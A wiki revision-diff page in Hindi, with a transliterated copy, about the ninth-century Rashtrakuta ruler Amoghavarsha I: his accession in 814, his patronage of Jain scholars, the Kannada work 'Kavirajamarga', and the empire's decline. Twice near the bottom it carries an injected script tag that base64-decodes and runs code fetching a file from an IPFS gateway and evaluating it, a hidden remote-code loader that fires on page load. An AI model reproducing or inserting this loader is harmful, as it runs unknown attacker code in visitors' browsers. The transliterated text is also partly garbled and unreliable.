Difference between revisions of "अमोघवर्ष प्रथम"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
Line 1: Line 1:
 
*814 ई. में [[गोविन्द तृतीय]] की मृत्यु हो जाने पर उसका पुत्र अमोघवर्ष [[मान्यखेट]] के राजसिंहासन पर आरूढ़ हुआ।  
 
*814 ई. में [[गोविन्द तृतीय]] की मृत्यु हो जाने पर उसका पुत्र अमोघवर्ष [[मान्यखेट]] के राजसिंहासन पर आरूढ़ हुआ।  
 +
*उसने पूर्वी चालुक्यों एवं गंगो से लम्बी लड़ाई लड़नी पड़ी।
 +
*वह योग्य शासक होने के साथ-साथ जिनसेन 'आदिपुराण' के रचनाकार, महावीरचार्य 'गणितसार-संग्रह' के रचनाकार एवं सक्तायाना 'अमोघवर्ष 'के रचनाकार जैसे विद्धानों का आश्रयदाता भी था।
 +
 +
*उसने स्वयं ही कन्नड़ के प्रसिद्ध ग्रंथ 'कविराज मार्ग' की रचना की।
 +
*अमोघवर्ष ने ही 'मान्यखेत' को राष्ट्रकूट की राजधानी बनाया।
 +
*तत्कालीन अरब यात्री सुलेमान ने अमोघवर्ष की गणना विश्व के तत्कालीन चार महान शासकों मे की थी।
 +
*वह [[जैन]] मतावलम्बी होते हुए भी हिन्दु देवी देवताओं का सम्मान करता था।
 +
*वह महालक्ष्मी का अनन्त भक्त था।
 +
*संजन ताम्रपत्र से यह पता चलता है कि उसने एक अवसर पर देवी को अपने बाएं हाथ की उंगली चढ़ा दी थी। उसकी तुलना [[शिव]], [[दधिचि]] जैसे पौराणिक व्यक्तियों से की जाती है।
 
*[[राष्ट्रकूट साम्राज्य]] में उसके विरोधियों की भी कमी नहीं थी। इस स्थिति से लाभ उठाकर न केवल अनेक अधीनस्थ राजाओं ने स्वतंत्र होने का प्रयत्न किया, अपितु विविध राष्ट्रकूट सामन्तों और राजपुरुषों ने भी उसके विरुद्ध षड़यंत्र आरम्भ कर दिए।  
 
*[[राष्ट्रकूट साम्राज्य]] में उसके विरोधियों की भी कमी नहीं थी। इस स्थिति से लाभ उठाकर न केवल अनेक अधीनस्थ राजाओं ने स्वतंत्र होने का प्रयत्न किया, अपितु विविध राष्ट्रकूट सामन्तों और राजपुरुषों ने भी उसके विरुद्ध षड़यंत्र आरम्भ कर दिए।  
 
*अमोघवर्ष का मंत्री करकराज था। अपने सामन्तों के षड़यंत्रों के कारण कुछ समय के लिए अमोघवर्ष को राजसिंहासन से भी हाथ धोना पड़ा। पर करकराज की सहायता से उसने राजपद पुनः प्राप्त किया।  
 
*अमोघवर्ष का मंत्री करकराज था। अपने सामन्तों के षड़यंत्रों के कारण कुछ समय के लिए अमोघवर्ष को राजसिंहासन से भी हाथ धोना पड़ा। पर करकराज की सहायता से उसने राजपद पुनः प्राप्त किया।  

Revision as of 12:45, 28 October 2010

  • 814 ee. mean govind tritiy ki mrityu ho jane par usaka putr amoghavarsh manyakhet ke rajasianhasan par aroodh hua.
  • usane poorvi chalukyoan evan gango se lambi l daee l dani p di.
  • vah yogy shasak hone ke sath-sath jinasen 'adipuran' ke rachanakar, mahavirachary 'ganitasar-sangrah' ke rachanakar evan saktayana 'amoghavarsh 'ke rachanakar jaise viddhanoan ka ashrayadata bhi tha.
  • usane svayan hi kann d ke prasiddh granth 'kaviraj marg' ki rachana ki.
  • amoghavarsh ne hi 'manyakhet' ko rashtrakoot ki rajadhani banaya.
  • tatkalin arab yatri suleman ne amoghavarsh ki ganana vishv ke tatkalin char mahan shasakoan me ki thi.
  • vah jain matavalambi hote hue bhi hindu devi devataoan ka samman karata tha.
  • vah mahalakshmi ka anant bhakt tha.
  • sanjan tamrapatr se yah pata chalata hai ki usane ek avasar par devi ko apane baean hath ki uangali chadha di thi. usaki tulana shiv, dadhichi jaise pauranik vyaktiyoan se ki jati hai.
  • rashtrakoot samrajy mean usake virodhiyoan ki bhi kami nahian thi. is sthiti se labh uthakar n keval anek adhinasth rajaoan ne svatantr hone ka prayatn kiya, apitu vividh rashtrakoot samantoan aur rajapurushoan ne bhi usake viruddh sh dayantr arambh kar die.
  • amoghavarsh ka mantri karakaraj tha. apane samantoan ke sh dayantroan ke karan kuchh samay ke lie amoghavarsh ko rajasianhasan se bhi hath dhona p da. par karakaraj ki sahayata se usane rajapad punah prapt kiya.
  • aantarik avyavastha ke karan amoghavarsh rashtrakoot samrajy ko akshunn rakh sakane mean asamarth raha, aur chalukyoan ne rashtrakootoan ki nirbalata se labh uthakar ek bar phir apane utkarsh ke lie prayatn kiya. isamean unhean saphalata bhi mili.
  • amoghavarsh ke shasan kal mean hi kannauj ke gurjar pratihar raja mihirabhoj ne apane vishal samrajy ka nirman kiya, aur uttari bharat se rashtrakootoan ke shasan ka ant kar diya.
  • gurjar pratihar log kis prakar kannauj ke svami bane, aur unhoanne ek vishal samrajy ki sthapana ki.
  • yah sarvatha spasht hai, ki amoghavarsh ke samay mean rashtrakoot samrajy ka apakarsh prarambh ho gaya tha.
  • amoghavarsh ne 814 se 878 ee. tak shasan kiya.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>